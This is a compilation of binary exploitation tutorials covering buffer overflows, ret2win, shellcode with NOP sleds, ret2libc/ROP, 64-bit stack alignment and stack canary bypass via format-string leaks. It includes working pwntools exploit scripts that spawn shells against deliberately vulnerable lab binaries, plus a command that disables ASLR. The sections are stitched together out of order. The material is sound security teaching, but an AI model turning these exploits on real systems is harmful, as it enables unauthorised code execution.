Running your own code
In real exploits, it's not particularly likely that you will have a win()
function lying around - shellcode is a way to run your own instructions, giving you the ability to run arbitrary commands on the system.
Shellcode is essentially a series of assembled instructions that we input into the binary as data; once it's in, we overwrite the return pointer to hijack code execution and point it at our own instructions!
I promise you can trust me but you should never ever run shellcode without knowing what it does. Pwntools is safe and has almost all the shellcode you will ever need.
The reason shellcode is successful is that Von Neumann architecture (the architecture used in most computers today) does not differentiate between data and instructions - it doesn't matter where or what you tell it to run, it will attempt to run it. Therefore, even though our input is data, the computer doesn't know that - and we can use that to our advantage.
ASLR is a security technique, and while it is not specifically designed to combat shellcode, it involves randomising certain aspects of memory (we will talk about it in much more detail later). This randomisation can make shellcode exploits like the one we're about to do less reliable, so we'll disable it for now with the following command.
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Again, you should never run commands if you don't know what they do
Let's debug unsafe()
using radare2
and work out where in memory the buffer starts; this is where we want to point the return pointer to.
$ r2 -d -A vuln
[0xf7fd40b0]> s sym.unsafe ; pdf
[...]
; var int32_t var_134h @ ebp-0x134
[...]
This value that gets printed out is a local variable - due to its size, it's fairly likely to be the buffer. Let's set a breakpoint just after gets()
and find the exact address.
[0x08049172]> dc
Overflow me
<<Found me>> <== This was my input
hit breakpoint at: 80491a8
[0x080491a8]> px @ ebp - 0x134
- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
0xffffcfb4 3c3c 466f 756e 6420 6d65 3e3e 00d1 fcf7 <<Found me>>....
[...]
It appears to be at 0xffffcfb4; if we run the binary multiple times, it should remain where it is (if it doesn't, make sure ASLR is disabled!).
Now we need to calculate the padding until the return pointer. We'll use the De Bruijn sequence as explained in the previous blog post.
$ ragg2 -P 400 -r
<copy this>
$ r2 -d -A vuln
[0xf7fd40b0]> dc
Overflow me
<<paste here>>
[0x73424172]> wopO `dr eip`
312
The padding is 312 bytes.
In order for the shellcode to be correct, we're going to set context.binary
to our binary; this grabs stuff like the arch, OS and bits and enables pwntools to provide us with working shellcode.
from pwn import *
context.binary = ELF('./vuln')
p = process()
Now we can use pwntools' awesome shellcode functionality to make it incredibly simple.
payload = asm(shellcraft.sh()) # The shellcode
payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4) # Address of the Shellcode
Yup, that's it. Now let's send it off and use p.interactive()
, which enables us to communicate to the shell.
log.info(p.clean())
p.sendline(payload)
p.interactive()
If you're getting an EOFError
, print out the shellcode and try to find it in memory - the stack address may be wrong
$ python3 exploit.py
[*] 'vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
[+] Starting local process 'vuln': pid 3606
[*] Overflow me
[*] Switching to interactive mode
$ whoami
ironstone
$ ls
exploit.py source.c vuln
And it works! Awesome.
from pwn import *
context.binary = ELF('./vuln')
p = process()
payload = asm(shellcraft.sh()) # The shellcode
payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4) # Address of the Shellcode
log.info(p.clean())
p.sendline(payload)
p.interactive()
We injected shellcode, a series of assembly instructions, when prompted for input
We then hijacked code execution by overwriting the saved return pointer on the stack and modified it to point to our shellcode
Once the return pointer got popped into EIP, it pointed at our shellcode
This caused the program to execute our instructions, giving us (in this case) a shell for arbitrary command execution
The defence against shellcode
As you can expect, programmers were hardly pleased that people could inject their own instructions into the program. The NX bit, which stands for No eXecute, defines areas of memory as either instructions or data. This means that your input will be stored as data, and any attempt to run it as instructions will crash the program, effectively neutralising shellcode.
To get around NX, exploit developers have to leverage a technique called ROP, Return-Oriented Programming.
You can either use pwntools' checksec
or rabin2
.
$ checksec vuln
[*] 'vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
$ rabin2 -I vuln
[...]
nx false
[...]
The differences between the sizes
Everything we have done so far is applicable to 64-bit as well as 32-bit; the only thing you would need to change is switch out the p32()
for p64()
as the memory addresses are longer.
The real difference between the two, however, is the way you pass parameters to functions (which we'll be looking at much closer soon); in 32-bit, all parameters are pushed to the stack before the function is called. In 64-bit, however, the first 6 are stored in the registers RDI, RSI, RDX, RCX, R8 and R9 respectively as per the calling convention. Note that different Operating Systems also have different calling conventions.
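As a quick sketch of the packing difference (both addresses here are made up):
from pwn import p32, p64
stack_addr_32 = 0xffffcfb4            # hypothetical 32-bit stack address
print(p32(stack_addr_32))             # b'\xb4\xcf\xff\xff' - 4 bytes, little-endian
stack_addr_64 = 0x7fffffffe3b0        # hypothetical 64-bit stack address
print(p64(stack_addr_64))             # b'\xb0\xe3\xff\xff\xff\x7f\x00\x00' - 8 bytes, little-endian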
The better way to calculate offsets
A De Bruijn sequence of order n is simply a sequence in which no string of n characters is repeated. This makes finding the offset until EIP much simpler - we can just pass in a De Bruijn sequence, get the value within EIP and find the one possible match within the sequence to calculate the offset. Let's do this on the ret2win binary.
Again, radare2
comes with a nice command-line tool (called ragg2
) that can generate it for us. Let's create a sequence of length 100
.
$ ragg2 -P 100 -r
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
The -P
specifies the length while -r
tells it to show ascii bytes rather than hex pairs.
Now we have the pattern, let's just input it in radare2
when prompted for input, make it crash and then calculate how far along the sequence the EIP is. Simples.
$ r2 -d -A vuln
[0xf7ede0b0]> dc
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41534141 code=1 ret=0
The address it crashes on is 0x41534141
; we can use radare2
's in-built wopO
command to work out the offset.
[0x41534141]> wopO 0x41534141
52
Awesome - we get the correct value!
We can also be lazy and not copy the value.
[0x41534141]> wopO `dr eip`
52
The backticks means the dr eip
is calculated first, before the wopO
is run on the result of it.
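If you'd rather stay in Python, pwntools has equivalent helpers, cyclic() and cyclic_find(); a small sketch, where the crash value is a made-up example:
from pwn import cyclic, cyclic_find
pattern = cyclic(100)                 # 100-byte De Bruijn pattern (4-byte subsequences by default)
print(pattern)                        # send this as the crashing input
offset = cyclic_find(0x6161616c)      # hypothetical EIP value from the crash - use your own
print(offset)                         # offset of that 4-byte chunk within the pattern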
More reliable shellcode exploits
NOP (no operation) instructions do exactly what they sound like: nothing. This makes them very useful for shellcode exploits, because all they do is pass execution on to the next instruction. If we pad our exploit on the left with NOPs and point EIP at the middle of them, execution will simply slide through the NOPs until it reaches our actual shellcode. This gives us a greater margin of error: a shift of a few bytes forwards or backwards won't really matter, as it just means a different number of NOPs get executed before the shellcode - with the same end result of running it. This padding with NOPs is often called a NOP slide or NOP sled, since EIP is essentially sliding down them.
In intel x86 assembly, NOP instructions are \x90
.
We can make slight changes to our exploit to do two things:
Add a large number of NOPs on the left
Adjust our return pointer to point at the middle of the NOPs rather than the buffer start
Make sure ASLR is still disabled. If you have to disable it again, you may have to readjust your previous exploit as the buffer location may be different.
It's probably worth mentioning that shellcode with NOPs is not failsafe; if you get unexpected errors when padding with NOPs but the shellcode worked before, try reducing the length of the NOP sled, as it may be interfering with other things on the stack.
Note that NOPs are only \x90
in certain architectures, and if you need others you can use pwntools:
nop = asm(shellcraft.nop())
from pwn import *
context.binary = ELF('./vuln')
p = process()
payload = b'\x90' * 240 # The NOPs
payload += asm(shellcraft.sh()) # The shellcode
payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4 + 120) # Address of the buffer + half nop length
log.info(p.clean())
p.sendline(payload)
p.interactive()
An introduction to binary exploitation
Binary Exploitation is about finding vulnerabilities in programs and utilising them to do what you wish. Sometimes this can result in an authentication bypass or the leaking of classified information, but occasionally (if you're lucky) it can also result in Remote Code Execution (RCE). The most basic forms of binary exploitation occur on the stack, a region of memory that stores temporary variables created by functions in code.
When a new function is called, a memory address in the calling function is pushed to the stack - this way, the program knows where to return to once the called function finishes execution. Let's look at a basic binary to show this.
The binary has two files - source.c
and vuln
; the latter is an ELF
file, which is the executable format for Linux (it is recommended to follow along with this with a Virtual Machine of your own, preferably Linux).
We're gonna use a tool called radare2
to analyse the behaviour of the binary when functions are called.
$ r2 -d -A vuln
The -d
runs it while the -A
performs analysis. We can disassemble main
with
s main; pdf
s main
seeks (moves) to main, while pdf
stands for Print Disassembly Function (literally just disassembles it).
0x080491ab 55 push ebp
0x080491ac 89e5 mov ebp, esp
0x080491ae 83e4f0 and esp, 0xfffffff0
0x080491b1 e80d000000 call sym.__x86.get_pc_thunk.ax
0x080491b6 054a2e0000 add eax, 0x2e4a
0x080491bb e8b2ffffff call sym.unsafe
0x080491c0 90 nop
0x080491c1 c9 leave
0x080491c2 c3 ret
The call to unsafe
is at 0x080491bb
, so let's break there.
db 0x080491bb
db
stands for debug breakpoint, and just sets a breakpoint. A breakpoint is simply somewhere which, when reached, pauses the program for you to run other commands. Now we run dc
for debug continue; this just carries on running the file.
It should break before unsafe
is called; let's analyse the top of the stack now:
[0x08049172]> pxw @ esp
0xff984af0 0xf7efe000 [...]
pxw
tells r2 to analyse the hex as words, that is, 32-bit values. I only show the first value here, which is 0xf7efe000
. This value is stored at the top of the stack, as ESP points to the top of the stack - in this case, that is 0xff984af0
.
Let's move one more instruction with ds
, debug step, and check the stack again. This will execute the call sym.unsafe
instruction.
[0x08049172]> pxw @ esp
0xff984aec 0x080491c0 0xf7efe000 [...]
Huh, something's been pushed onto the top of the stack - the value 0x080491c0
. This looks like it's in the binary - but where? Let's look back at the disassembly from before:
[...]
0x080491b6 054a2e0000 add eax, 0x2e4a
0x080491bb e8b2ffffff call sym.unsafe
0x080491c0 90 nop
[...]
We can see that 0x080491c0
is the memory address of the instruction after the call to unsafe
. Why? This is how the program knows where to return to after unsafe()
has finished.
But as we're interested in binary exploitation, let's see how we can possibly break this. First, let's disassemble unsafe
and break on the ret
instruction; ret
is the equivalent of pop eip
, which will get the saved return pointer we just analysed on the stack into the eip
register. Then let's continue and spam a bunch of characters into the input and see how that could affect it.
[0x08049172]> db 0x080491aa
[0x08049172]> dc
Overflow me
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Now let's read the value at the location the return pointer was at previously, which as we saw was 0xff984aec
.
[0x080491aa]> pxw @ 0xff984aec
0xff984aec 0x41414141 0x41414141 0x41414141 0x41414141 AAAAAAAAAAAAAAAA
Huh?
It's quite simple - we inputted more data than the program expected, which resulted in us overwriting more of the stack than the developer expected. The saved return pointer is also on the stack, meaning we managed to overwrite it. As a result, on the ret
, the value popped into eip
won't be in the previous function but rather 0x41414141
. Let's check with ds
.
[0x080491aa]> ds
[0x41414141]>
And look at the new prompt - 0x41414141
. Let's run dr eip
to make sure that's the value in eip
:
[0x41414141]> dr eip
0x41414141
Yup, it is! We've successfully hijacked the program execution! Let's see if it crashes when we let it run with dc
.
[0x41414141]> dc
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41414141 code=1 ret=0
radare2
is very useful and prints out the address that causes it to crash. If you cause the program to crash outside of a debugger, it will usually say Segmentation Fault
, which could mean a variety of things, but usually that you have overwritten EIP.
When a function calls another function, it pushes a return pointer to the stack so the called function knows where to return; when the called function finishes execution, it pops it off the stack again.
Because this value is saved on the stack, just like our local variables, if we write more characters than the program expects, we can overwrite the value and redirect code execution to wherever we wish. Functions such as fgets()
can prevent such easy overflow, but you should check how much is actually being read.
The most basic binexp challenge
A ret2win is simply a binary where there is a win()
function (or equivalent); once you successfully redirect execution there, you complete the challenge.
To carry this out, we have to leverage what we learnt in the introduction, but in a predictable manner - we have to overwrite EIP, but to a specific value of our choice.
To do this, what do we need to know? Well, a couple things:
The padding until we begin to overwrite the return pointer (EIP)
What value we want to overwrite EIP to
When I say "overwrite EIP", I mean overwrite the saved return pointer that gets popped into EIP. The EIP register is not located on the stack, so it is not overwritten directly.
This can be found using simple trial and error; if we send a variable numbers of characters, we can use the Segmentation Fault
message, in combination with radare2, to tell when we overwrote EIP. There is a better way to do it than simple brute force (we'll cover this in the next post), but it'll do for now.
We get an offset of 52 bytes.
Now we need to find the address of the flag()
function in the binary. This is simple.
$ r2 -d -A vuln
$ afl
[...]
0x080491c3 1 43 sym.flag
[...]
The flag()
function is at 0x080491c3
.
The final piece of the puzzle is to work out how we can send the address we want. If you think back to the introduction, the A
s that we sent became 0x41
- which is the ASCII code of A
. So the solution is simple - let's just find the characters with ascii codes 0x08
, 0x04
, 0x91
and 0xc3
.
This is a lot simpler than you might think, because we can specify them in python as hex:
address = '\x08\x04\x91\xc3'
And that makes it much easier.
Now we know the padding and the value, let's exploit the binary! We can use pwntools
to interface with the binary (check out the pwntools posts for a more in-depth look).
from pwn import * # This is how we import pwntools
p = process('./vuln') # We're starting a new process
payload = 'A' * 52
payload += '\x08\x04\x91\xc3'
p.clean() # Receive all the text
p.sendline(payload)
log.info(p.clean()) # Output the "Exploited!" string to know we succeeded
If you run this, there is one small problem: it won't work. Why? Let's check with a debugger. We'll put in a pause()
to give us time to attach radare2
onto the process.
from pwn import *
p = process('./vuln')
payload = 'A' * 52
payload += '\x08\x04\x91\xc3'
log.info(p.clean())
pause() # add this in
p.sendline(payload)
log.info(p.clean())
Now let's run the script with python3 exploit.py
and then open up a new terminal window.
r2 -d -A $(pidof vuln)
By providing the PID of the process, radare2 hooks onto it. Let's break at the return of unsafe()
and read the value of the return pointer.
[0x08049172]> db 0x080491aa
[0x08049172]> dc
<< press any button on the exploit terminal window >>
hit breakpoint at: 80491aa
[0x080491aa]> pxw @ esp
0xffdb0f7c 0xc3910408 [...]
[...]
0xc3910408
- look familiar? It's the address we were trying to send over, except the bytes have been reversed, and the reason for this reversal is endianness. Big-endian systems store the most significant byte (the byte with the greatest value) at the smallest memory address, and this is how we sent them. Little-endian does the opposite (for a reason), and most binaries you will come across are little-endian. As far as we're concerned, the bytes are stored in reverse order in little-endian executables.
radare2
comes with a nice tool called rabin2
for binary analysis:
$ rabin2 -I vuln
[...]
endian little
[...]
So our binary is little-endian.
The fix is simple - reverse the address (you can also remove the pause()
)
payload += '\x08\x04\x91\xc3'[::-1]
If you run this now, it will work:
$ python3 tutorial.py
[+] Starting local process './vuln': pid 2290
[*] Overflow me
[*] Exploited!!!!!
And wham, you've called the flag()
function! Congrats!
Unsurprisingly, you're not the first person to have thought "could they possibly make endianness simpler" - luckily, pwntools has a built-in p32()
function ready for use!
payload += '\x08\x04\x91\xc3'[::-1]
becomes
payload += p32(0x080491c3)
Much simpler, right?
The only caveat is that it returns bytes
rather than a string, so you have to make the padding a byte string:
payload = b'A' * 52 # Notice the "b"
Otherwise you will get a
TypeError: can only concatenate str (not "bytes") to str
from pwn import * # This is how we import pwntools
p = process('./vuln') # We're starting a new process
payload = b'A' * 52
payload += p32(0x080491c3) # Use pwntools to pack it
log.info(p.clean()) # Receive all the text
p.sendline(payload)
log.info(p.clean()) # Output the "Exploited!" string to know we succeeded
A minor issue
A small issue you may get when pwning on 64-bit systems is that your exploit works perfectly locally but fails remotely - or even fails when you try to use the provided LIBC version rather than your local one. This arises due to something called stack alignment.
Essentially, the 64-bit calling convention requires the stack to be 16-byte aligned when a function is called. LIBC takes advantage of this guarantee and uses SSE instructions to optimise execution; system
in particular utilises instructions such as movaps
, which operate on 16-byte aligned data.
That means that if the stack is not 16-byte aligned - that is, RSP is not a multiple of 16 - the ROP chain will fail on system
.
The fix is simple - in your ROP chain, before the call to system
, place a singular ret
gadget:
This works because the extra ret pops another 8 bytes off the stack, moving RSP forward by 8 and restoring the 16-byte alignment.
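As a hedged sketch (every address below is made up and would come from your own binary and libc), the chain would look something like this:
from pwn import p64
RET     = 0x40101a                    # address of a lone `ret` gadget (hypothetical)
POP_RDI = 0x4011cb                    # pop rdi; ret (hypothetical)
system  = 0x7ffff7e2de20              # resolved address of system() (hypothetical)
binsh   = 0x7ffff7f70143              # address of "/bin/sh" in libc (hypothetical)
payload  = b'A' * 72                  # padding up to the saved return pointer (hypothetical)
payload += p64(POP_RDI)
payload += p64(binsh)                 # first parameter: pointer to "/bin/sh"
payload += p64(RET)                   # the extra ret moves RSP on by 8, restoring 16-byte alignment
payload += p64(system)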
The standard ROP exploit
A ret2libc is based off the system
function found within the C library. This function executes anything passed to it making it the best target. Another thing found within libc is the string /bin/sh
; if you pass this string to system
, it will pop a shell.
And that is the entire basis of it - passing /bin/sh
as a parameter to system
. Doesn't sound too bad, right?
To start with, we are going to disable ASLR. ASLR randomises the location of libc in memory, meaning we cannot (without other steps) work out the location of system
and /bin/sh
. To understand the general theory, we will start with it disabled.
Fortunately Linux has a command called ldd
for dynamic linking. If we run it on our compiled ELF file, it'll tell us the libraries it uses and their base addresses.
We need libc.so.6
, so the base address of libc is 0xf7dc2000
.
To call system, we obviously need its location in memory. We can use the readelf
command for this.
The -s
flag tells readelf
to search for symbols, for example functions. Here we can find the offset of system from libc base is 0x44f00
.
Since /bin/sh
is just a string, we can use strings
on the dynamic library we just found with ldd
. Note that when passing strings as parameters you need to pass a pointer to the string, not the hex representation of the string, because that's how C expects it.
-a
tells it to scan the entire file; -t x
tells it to output the offset in hex.
Repeat the process with the libc
linked to the 64-bit exploit (should be called something like /lib/x86_64-linux-gnu/libc.so.6
).
Note that instead of passing the parameter in after the return pointer, you will have to use a pop rdi; ret
gadget to put it into the RDI register.
Unsurprisingly, pwntools has a bunch of features that make this much simpler.
The 64-bit looks essentially the same.
ret = elf.address + 0x2439
[...]
rop.raw(POP_RDI)
rop.raw(0x4) # first parameter
rop.raw(ret) # align the stack
rop.raw(system)
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ ldd vuln-32
linux-gate.so.1 (0xf7fd2000)
libc.so.6 => /lib32/libc.so.6 (0xf7dc2000)
/lib/ld-linux.so.2 (0xf7fd3000)
$ readelf -s /lib32/libc.so.6 | grep system
1534: 00044f00 55 FUNC WEAK DEFAULT 14 system@@GLIBC_2.0
$ strings -a -t x /lib32/libc.so.6 | grep /bin/sh
18c32b /bin/sh
from pwn import *
p = process('./vuln-32')
libc_base = 0xf7dc2000
system = libc_base + 0x44f00
binsh = libc_base + 0x18c32b
payload = b'A' * 76 # The padding
payload += p32(system) # Location of system
payload += p32(0x0) # return pointer - not important once we get the shell
payload += p32(binsh) # pointer to command: /bin/sh
p.clean()
p.sendline(payload)
p.interactive()
$ ROPgadget --binary vuln-64 | grep rdi
[...]
0x00000000004011cb : pop rdi ; ret
from pwn import *
p = process('./vuln-64')
libc_base = 0x7ffff7de5000
system = libc_base + 0x48e20
binsh = libc_base + 0x18a143
POP_RDI = 0x4011cb
payload = b'A' * 72 # The padding
payload += p64(POP_RDI) # gadget -> pop rdi; ret
payload += p64(binsh) # pointer to command: /bin/sh
payload += p64(system) # Location of system
payload += p64(0x0) # return pointer - not important once we get the shell
p.clean()
p.sendline(payload)
p.interactive()
# 32-bit
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
libc = elf.libc # Simply grab the libc it's running with
libc.address = 0xf7dc2000 # Set base address
system = libc.sym['system'] # Grab location of system
binsh = next(libc.search(b'/bin/sh')) # grab string location
payload = b'A' * 76 # The padding
payload += p32(system) # Location of system
payload += p32(0x0) # return pointer - not important once we get the shell
payload += p32(binsh) # pointer to command: /bin/sh
p.clean()
p.sendline(payload)
p.interactive()
The Buffer Overflow defence
Stack Canaries are very simple - at the beginning of the function, a random value is placed on the stack. Before the program executes ret
, the current value of that variable is compared to the initial: if they are the same, no buffer overflow has occurred.
If they are not, the attacker attempted to overflow to control the return pointer and the program crashes, often with a ***stack smashing detected***
error message.
There are two ways to bypass a canary.
This is quite broad and will differ from binary to binary, but the main aim is to read the value. The simplest option is using format string if it is present - the canary, like other local variables, is on the stack, so if we can leak values off the stack it's easy.
#include <stdio.h>
void vuln() {
char buffer[64];
puts("Leak me");
gets(buffer);
printf(buffer);
puts("");
puts("Overflow me");
gets(buffer);
}
int main() {
vuln();
}
void win() {
puts("You won!");
}
The source is very simple - it gives you a format string vulnerability, then a buffer overflow vulnerability. We can use the format string to leak the canary value, then overwrite the canary with itself. This way, we can overflow past the canary without triggering the check, as its value remains constant. And of course, we just have to run win().
First let's check there is a canary:
$ pwn checksec vuln-32
[*] 'vuln-32'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Yup, there is. Now we need to calculate at what offset the canary is at, and to do this we'll use radare2.
$ r2 -d -A vuln-32
[0xf7f2e0b0]> db 0x080491d7
[0xf7f2e0b0]> dc
Leak me
%p
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
0xffd7cd60 0xffd7cd7c 0xffd7cdec 0x00000002 0x0804919e |...............
0xffd7cd70 0x08048034 0x00000000 0xf7f57000 0x00007025 4........p..%p..
0xffd7cd80 0x00000000 0x00000000 0x08048034 0xf7f02a28 ........4...(*..
0xffd7cd90 0xf7f01000 0xf7f3e080 0x00000000 0xf7d53ade .............:..
0xffd7cda0 0xf7f013fc 0xffffffff 0x00000000 0x080492cb ................
0xffd7cdb0 0x00000001 0xffd7ce84 0xffd7ce8c 0xadc70e00 ................
The last value there is the canary. We can tell because it's roughly 64 bytes after the "buffer start", which should be close to the end of the buffer. Additionally, it ends in 00
and looks very random, unlike the libc and stack addresses that start with f7
and ff
. If we count the number of addresses it's around 24 until that value, so we go one before and one after as well to make sure.
$ ./vuln-32
Leak me
%23$p %24$p %25$p
0xa4a50300 0xf7fae080 (nil)
It appears to be at %23$p
. Remember, stack canaries are randomised for each new process, so it won't be the same.
Now let's just automate grabbing the canary with pwntools:
from pwn import *
p = process('./vuln-32')
log.info(p.clean())
p.sendline('%23$p')
canary = int(p.recvline(), 16)
log.success(f'Canary: {hex(canary)}')
$ python3 exploit.py
[+] Starting local process './vuln-32': pid 14019
[*] b'Leak me\n'
[+] Canary: 0xcc987300
Now all that's left is to work out what the offset is until the canary, and then the offset from after the canary to the return pointer.
$ r2 -d -A vuln-32
[0xf7fbb0b0]> db 0x080491d7
[0xf7fbb0b0]> dc
Leak me
%23$p
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
[...]
0xffea8af0 0x00000001 0xffea8bc4 0xffea8bcc 0xe1f91c00
We see the canary is at 0xffea8afc
. A little later on the return pointer (we assume) is at 0xffea8b0c
. Let's break just after the next gets()
and check what value we overwrite it with (we'll use a De Bruijn pattern).
[0x080491d7]> db 0x0804920f
[0x080491d7]> dc
0xe1f91c00
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFA
hit breakpoint at: 804920f
[0x0804920f]> pxw @ 0xffea8afc
0xffea8afc 0x41574141 0x41415841 0x5a414159 0x41614141 AAWAAXAAYAAZAAaA
0xffea8b0c 0x41416241 0x64414163 0x41654141 0x41416641 AbAAcAAdAAeAAfAA
Now we can check the canary and EIP offsets:
[0x0804920f]> wopO 0x41574141
64
[0x0804920f]> wopO 0x41416241
80
Return pointer is 16 bytes after the canary start, so 12 bytes after the canary.
from pwn import *
p = process('./vuln-32')
log.info(p.clean())
p.sendline('%23$p')
canary = int(p.recvline(), 16)
log.success(f'Canary: {hex(canary)}')
payload = b'A' * 64
payload += p32(canary) # overwrite canary with original value to not trigger
payload += b'A' * 12 # pad to return pointer
payload += p32(0x08049245)
p.clean()
p.sendline(payload)
print(p.clean().decode('latin-1'))
Same source, same approach, just 64-bit. Try it yourself before checking the solution.
This is possible on 32-bit, and sometimes unavoidable. It's not, however, feasible on 64-bit.
As you can expect, the general idea is to run the process loads and loads of times with random canary values until you get a hit, which you can identify by the presence of a known plaintext, e.g. flag{. This can take ages to run and is frankly not a particularly interesting challenge.
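For completeness, a rough sketch of what that brute force could look like - the binary name, offsets and win address are all placeholders:
import os
from pwn import process, p32, context
context.log_level = 'error'           # keep pwntools quiet while we spin
PADDING  = 64                         # hypothetical offset up to the canary
WIN_ADDR = 0x08049245                 # hypothetical address of win()
while True:
    p = process('./vuln-32')
    canary = b'\x00' + os.urandom(3)  # the canary's low byte (first in memory) is a null byte
    payload = b'A' * PADDING + canary + b'A' * 12 + p32(WIN_ADDR)  # 12 bytes between canary and return pointer
    p.sendline(payload)
    output = p.clean(timeout=0.5)
    p.close()
    if b'flag{' in output:            # known plaintext tells us the guess was right
        print(output)
        break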
Bypassing NX
The basis of ROP is chaining together small chunks of code already present within the binary itself in such a way to do what you wish. This often involves passing parameters to functions already present within libc
, such as system
- if you can find the location of a command, such as cat flag.txt
, and then pass it as a parameter to system
, it will execute that command and return the output. A more dangerous command is /bin/sh
, which when run by system
gives the attacker a shell much like the shellcode we used did.
Doing this, however, is not as simple as it may seem at first. To be able to properly call functions, we first have to understand how to pass parameters to them.
A more in-depth look into parameters for 32-bit and 64-bit programs
Let's have a quick look at the source:
#include <stdio.h>
void vuln(int check) {
if(check == 0xdeadbeef) {
puts("Nice!");
} else {
puts("Not nice!");
}
}
int main() {
vuln(0xdeadbeef);
vuln(0xdeadc0de);
}
Pretty simple.
If we run the 32-bit and 64-bit versions, we get the same output:
Nice!
Not nice!
Just what we expected.
Let's open the binary up in radare2 and disassemble it.
$ r2 -d -A vuln-32
$ s main; pdf
0x080491ac 8d4c2404 lea ecx, [argv]
0x080491b0 83e4f0 and esp, 0xfffffff0
0x080491b3 ff71fc push dword [ecx - 4]
0x080491b6 55 push ebp
0x080491b7 89e5 mov ebp, esp
0x080491b9 51 push ecx
0x080491ba 83ec04 sub esp, 4
0x080491bd e832000000 call sym.__x86.get_pc_thunk.ax
0x080491c2 053e2e0000 add eax, 0x2e3e
0x080491c7 83ec0c sub esp, 0xc
0x080491ca 68efbeadde push 0xdeadbeef
0x080491cf e88effffff call sym.vuln
0x080491d4 83c410 add esp, 0x10
0x080491d7 83ec0c sub esp, 0xc
0x080491da 68dec0adde push 0xdeadc0de
0x080491df e87effffff call sym.vuln
0x080491e4 83c410 add esp, 0x10
0x080491e7 b800000000 mov eax, 0
0x080491ec 8b4dfc mov ecx, dword [var_4h]
0x080491ef c9 leave
0x080491f0 8d61fc lea esp, [ecx - 4]
0x080491f3 c3 ret
If we look closely at the calls to sym.vuln
, we see a pattern:
push 0xdeadbeef
call sym.vuln
[...]
push 0xdeadc0de
call sym.vuln
We literally push
the parameter to the stack before calling the function. Let's break on sym.vuln
.
[0x080491ac]> db sym.vuln
[0x080491ac]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffdeb54c 0x080491d4 0xdeadbeef 0xffdeb624 0xffdeb62c
The first value there is the return pointer that we talked about before - the second, however, is the parameter. This makes sense because the return pointer gets pushed during the call
, so it should be at the top of the stack. Now let's disassemble sym.vuln
.
┌ 74: sym.vuln (int32_t arg_8h);
│ ; var int32_t var_4h @ ebp-0x4
│ ; arg int32_t arg_8h @ ebp+0x8
│ 0x08049162 b 55 push ebp
│ 0x08049163 89e5 mov ebp, esp
│ 0x08049165 53 push ebx
│ 0x08049166 83ec04 sub esp, 4
│ 0x08049169 e886000000 call sym.__x86.get_pc_thunk.ax
│ 0x0804916e 05922e0000 add eax, 0x2e92
│ 0x08049173 817d08efbead. cmp dword [arg_8h], 0xdeadbeef
│ ┌─< 0x0804917a 7516 jne 0x8049192
│ │ 0x0804917c 83ec0c sub esp, 0xc
│ │ 0x0804917f 8d9008e0ffff lea edx, [eax - 0x1ff8]
│ │ 0x08049185 52 push edx
│ │ 0x08049186 89c3 mov ebx, eax
│ │ 0x08049188 e8a3feffff call sym.imp.puts ; int puts(const char *s)
│ │ 0x0804918d 83c410 add esp, 0x10
│ ┌──< 0x08049190 eb14 jmp 0x80491a6
│ │└─> 0x08049192 83ec0c sub esp, 0xc
│ │ 0x08049195 8d900ee0ffff lea edx, [eax - 0x1ff2]
│ │ 0x0804919b 52 push edx
│ │ 0x0804919c 89c3 mov ebx, eax
│ │ 0x0804919e e88dfeffff call sym.imp.puts ; int puts(const char *s)
│ │ 0x080491a3 83c410 add esp, 0x10
│ │ ; CODE XREF from sym.vuln @ 0x8049190
│ └──> 0x080491a6 90 nop
│ 0x080491a7 8b5dfc mov ebx, dword [var_4h]
│ 0x080491aa c9 leave
└ 0x080491ab c3 ret
Here I'm showing the full output of the command because a lot of it is relevant. radare2
does a great job of detecting local variables - as you can see at the top, there is one called arg_8h
. Later this same one is compared to 0xdeadbeef
:
cmp dword [arg_8h], 0xdeadbeef
Clearly that's our parameter.
So now we know, when there's one parameter, it gets pushed to the stack so that the stack looks like:
return address param_1
Let's disassemble main
again here.
0x00401153 55 push rbp
0x00401154 4889e5 mov rbp, rsp
0x00401157 bfefbeadde mov edi, 0xdeadbeef
0x0040115c e8c1ffffff call sym.vuln
0x00401161 bfdec0adde mov edi, 0xdeadc0de
0x00401166 e8b7ffffff call sym.vuln
0x0040116b b800000000 mov eax, 0
0x00401170 5d pop rbp
0x00401171 c3 ret
Hohoho, it's different. As we mentioned before, the parameter gets moved to rdi
(in the disassembly here it's edi
, but edi
is just the lower 32 bits of rdi
, and the parameter is only 32 bits long, so it says EDI
instead). If we break on sym.vuln
again we can check rdi
with the command
dr rdi
[0x00401153]> db sym.vuln
[0x00401153]> dc
hit breakpoint at: 401122
[0x00401122]> dr rdi
0xdeadbeef
Awesome.
#include <stdio.h>
